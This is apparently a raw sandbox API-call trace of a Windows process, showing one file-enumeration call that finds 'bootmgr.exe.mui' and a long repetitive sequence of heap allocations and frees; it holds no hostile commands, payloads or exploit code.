FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.363] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe83b9c0f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16040, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.364] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.364] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.364] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.364] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.365] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.366] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.366] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.367] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.367] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.368] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.369] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.369] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.370] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.370] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.371] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.371] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.372] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.372] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.373] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.373] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.374] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.374] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.375] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.375] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.376] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.376] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.377] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.377] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.378] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.378] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.379] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.379] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.380] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.380] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.381] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.381] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.382] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.382] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.383] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0184.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.383] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.384] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.384] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.385] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.385] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.386] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.386] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.387] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.387] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.388] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.388] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.389] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.389] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.390] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.390] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.391] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.391] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.392] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.392] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.393] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.393] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.394] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.394] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.395] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.395] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.396] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.396] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.397] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.397] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.398] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.398] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.399] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.399] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.400] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.400] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.401] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.401] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.402] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.402] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.403] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.403] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.404] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.404] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.405] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.405] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.406] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.406] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.407] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e837c8 | out: hHeap=0x620000) returned 1 [0184.407] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.407] RtlAllocateHeap 